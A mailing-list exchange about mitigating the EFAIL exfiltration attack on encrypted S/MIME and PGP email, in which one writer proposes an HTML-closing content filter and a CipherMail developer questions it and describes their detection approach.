On 02-07-18 01:15, Dr. Rolf Jansen wrote: > Hello, > > I read carefully the technical paper about the exfiltration attack > (efail) on decrypted S/MIME or PGP content. > > https://efail.de > https://efail.de/efail-attack-paper.pdf > > According to my understanding, sanitizing text/html content to a certain > extend in the mail body should mitigate the attack. Since the e-mail > sender may send an encrypted message to a number of receivers at the > same time, who are not necessarily all behind our Postfix server, the > mitigation would be partial from the senders point of view, but should > be complete on the receivers site getting sanitized HTML content only. > > I am planning to write an after-queue content filter. Full HTML > sanitizing is out of the scope in the moment, however, inserting the > four character sequence '>"> (in words: single-quote, greater, > double-quote, greater) right at the end of a text/html multipart, which > is directly followed by an application/pkcs7-mime part should be > sufficient to close the ef-attack vector. BASE64 transfer encoded HTML > needs to be decoded before, of course. > > Does this sound reasonable?
I'm not certain that inserting '>"> will help. If you can insert arbitrary characters, the attacker might also be able to "escape" you escape sequence. I did some analysis of EFAIL for S/MIME. The option we implemented was to add some detection for EFAIL and possible refuse to decrypt if EFAIL was detected. See for more info: https://www.ciphermail.com/blog/efail-detection-and-prevention.html > Did somebody wrote this kind of a filter already and would be ready to > share it with others? You might try CipherMail (https://www.ciphermail.com/gateway.html) > If not, I will start the work in the course of this week. Any comments, > are welcome. > > Once the filter is working, I would only need to ask my peers not to Cc, > Bcc, and/or mail-To encrypted messages to other parties at the same > time, at least until most of the e-mail clients sanitize HTML mails > internally - which may take a while, though. We spend quite some time trying to attack mail clients with the EFAIL S/MIME attack. Even though inserting data into the stream is easy, we haven't been able to actually misuse Outlook. Outlook is a picky email client and refuses to decrypt email if not all things are exactly correct. Allowing characters to be inserted into an encrypted stream is a serious issue. However I think that in practical cases, attacking S/MIME on Outlook is not easy (or not possible at all). Kind regards, Martijn Brinkers
